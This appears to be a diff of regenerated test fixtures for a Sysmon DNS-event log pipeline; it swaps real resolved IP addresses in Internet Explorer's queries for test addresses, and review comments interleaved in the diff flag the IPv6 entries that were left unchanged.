Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15741,12 +15565,12 @@ "type": "CNAME" }, { - "data": "23.52.161.238", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.161.238" + "89.160.20.156" ] }, "network": { 
@@ -15763,13 +15587,13 @@ "t.ssl.ak.dynamic.tiles.virtualearth.net" ], "ip": [ - "23.52.161.238" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742296300Z", + "ingested": "2021-12-09T13:50:23.457463Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15829,11 +15653,11 @@ }, "answers": [ { - "data": "74.217.253.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -15841,7 +15665,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -15849,7 +15673,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { 
@@ -15857,7 +15681,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -15865,7 +15689,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -15873,23 +15697,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "74.217.253.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
@@ -15904,24 +15728,24 @@ "rp.gwallet.com" ], "ip": [ - "74.217.253.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742304700Z", + "ingested": "2021-12-09T13:50:23.457468800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15985,7 +15809,7 @@ "type": "CNAME" }, { - "data": "98.139.225.43", + "data": "89.160.20.156", "type": "A" }, { @@ -15993,19 +15817,19 @@ "type": "A" }, { - "data": "72.30.3.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.155.194.56", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "98.139.225.43", + "89.160.20.156", "98.138.49.44", - "72.30.3.43", - "216.155.194.56" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
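Review bot: The rp.gwallet.com event still carries the real IPv6 gTLD-server addresses (`2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30`, `2001:502:1ca1::30`) as unchanged context in `answers`, `resolved_ip` and `related.ip`, while their IPv4 siblings were moved from 192.5/192.33/192.26/192.31/192.12/192.35 into 192.168.0.0/16. If the goal is that every public address in the fixtures belongs to the supported test subset, those six IPv6 records are missed; if IPv6 is intentionally left alone because the subset only covers IPv4, a one-line note in the changelog entry or the PR description would save the next person from re-raising it. Note also that 192.168.x.30 is RFC 1918 space, so these answers will presumably be skipped by any public-IP geo enrichment rather than enriched — fine if intended, but that differs from the other events where everything was pointed at `89.160.20.156`. This file appears to be regenerated expected output, so the change belongs in the raw input log rather than here.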
@@ -16021,16 +15845,14 @@ "ads.yahoo.com" ], "ip": [ - "98.139.225.43", - "98.138.49.44", - "72.30.3.43", - "216.155.194.56" + "89.160.20.156", + "98.138.49.44" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742313400Z", + "ingested": "2021-12-09T13:50:23.457474500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16097,22 +15919,22 @@ }, "answers": [ { - "data": "169.55.104.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "169.60.66.35", + "data": "89.160.20.156", "type": "A" }, { - "data": "169.61.103.241", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "169.55.104.49", - "169.60.66.35", - "169.61.103.241" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -16127,15 +15949,13 @@ "um.simpli.fi" ], "ip": [ - "169.55.104.49", - "169.60.66.35", - "169.61.103.241" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742321800Z", + "ingested": "2021-12-09T13:50:23.457480600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16195,11 +16015,11 @@ }, "answers": [ { - "data": "35.186.236.204", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -16207,7 +16027,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -16215,7 +16035,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -16223,7 +16043,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -16231,7 +16051,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 },
 {
@@ -16240,16 +16060,16 @@
 }
 ],
 "resolved_ip": [
- "35.186.236.204",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30",
+ "192.168.94.30",
 "2001:502:1ca1::30"
 ]
 },
@@ -16265,23 +16085,23 @@ "mpp.vindicosuite.com" ], "ip": [ - "35.186.236.204", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742330100Z", + "ingested": "2021-12-09T13:50:23.457486400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16341,12 +16161,12 @@ }, "answers": [ { - "data": "8.41.222.152", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "8.41.222.152" + "89.160.20.156" ] }, "network": { 
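Review bot: The additional-section addresses that sit next to the IPv6 entries in this hunk (`192.5.6.30` → `192.168.6.30`, `192.33.14.30` → `192.168.14.30`, and so on, in `answers`, `resolved_ip`, the `ip` array and the `QueryResults` text) are now RFC 1918 private addresses, while their `2001:503:…`/`2001:500:…`/`2001:502:…` counterparts are left as real public IPv6 addresses. If the goal is to keep every test address inside the supported subset, the IPv6 answers presumably need the same treatment; if `192.168.0.0/16` was chosen because private ranges are skipped by enrichment, that deserves a short note next to the test input so the next regeneration does not turn them back into public addresses. The event object this hunk belongs to starts and ends outside the hunk.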
@@ -16361,13 +16181,13 @@ "sync.1rx.io" ], "ip": [ - "8.41.222.152" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742338400Z", + "ingested": "2021-12-09T13:50:23.457492500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:8.41.222.152;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files 